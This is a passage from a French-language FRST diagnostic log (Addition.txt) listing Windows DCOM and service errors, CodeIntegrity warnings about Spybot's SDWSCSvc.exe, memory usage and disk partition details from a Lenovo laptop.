disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. Error: (05/27/2017 03:26:39 PM) (Source: DCOM) (EventID: 10010) (User: AUTORITE NT) Description: Le serveur {784E29F4-5EBE-4279-9948-1E8FE941646D} ne s’est pas enregistré sur DCOM avant la fin du temps imparti. Error: (05/27/2017 03:23:38 PM) (Source: Service Control Manager) (EventID: 7023) (User: ) Description: Le service CDPUserSvc_5171e s’est arrêté avec l’erreur : Erreur non spécifiée Error: (05/27/2017 03:23:20 PM) (Source: DCOM) (EventID: 10016) (User: AUTORITE NT) Description: Les paramètres d’autorisation propres à l’application n’accordent pas l’autorisation Local Activation pour l’application serveur COM avec le CLSID {6B3B8D23-FA8D-40B9-8DBD-B950333E2C52} et l’APPID {4839DDB7-58C2-48F5-8283-E1D1807D0D7D} au SID AUTORITE NT\SERVICE LOCAL de l’utilisateur (S-1-5-19) depuis l’adresse LocalHost (avec LRPC) s’exécutant dans le SID Non disponible du conteneur d’applications (Non disponible). Cette autorisation de sécurité peut être modifiée à l’aide de l’outil d’administration Services de composants. CodeIntegrity: =================================== Date: 2017-05-27 17:23:47.543 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-27 17:23:47.540 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-27 17:23:47.522 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-27 17:23:47.519 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-27 16:07:39.394 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-27 15:23:15.887 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-27 15:19:59.141 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-27 14:52:31.926 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-27 14:52:31.923 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. Date: 2017-05-27 14:51:52.251 Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume5\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source. ==================== Infos Mémoire =========================== Processeur: Intel(R) Core(TM) i5-4200U CPU @ 1.60GHz Pourcentage de mémoire utilisée: 37% Mémoire physique - RAM - totale: 8104.27 MB Mémoire physique - RAM - disponible: 5050.87 MB Mémoire virtuelle totale: 16808.27 MB Mémoire virtuelle disponible: 13421.88 MB ==================== Lecteurs ================================ Drive c: (Windows8_OS) (Fixed) (Total:219.41 GB) (Free:115.07 GB) NTFS Drive d: (LENOVO) (Fixed) (Total:4 GB) (Free:0.88 GB) NTFS ==================== MBR & Table des partitions ================== ======================================================== Disk: 0 (Size: 238.5 GB) (Disk ID: 96DB1325) Partition: GPT. ==================== Fin de Addition.txt ============================